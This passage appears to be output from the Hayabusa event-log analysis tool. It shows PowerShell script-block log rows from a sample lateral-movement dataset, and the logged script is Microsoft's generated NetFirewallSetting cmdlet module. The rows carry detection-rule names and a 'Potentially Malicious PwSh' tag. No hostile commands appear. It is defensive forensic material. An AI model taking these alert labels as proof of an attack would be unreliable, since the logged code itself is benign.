[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 
[Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = 
${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH 
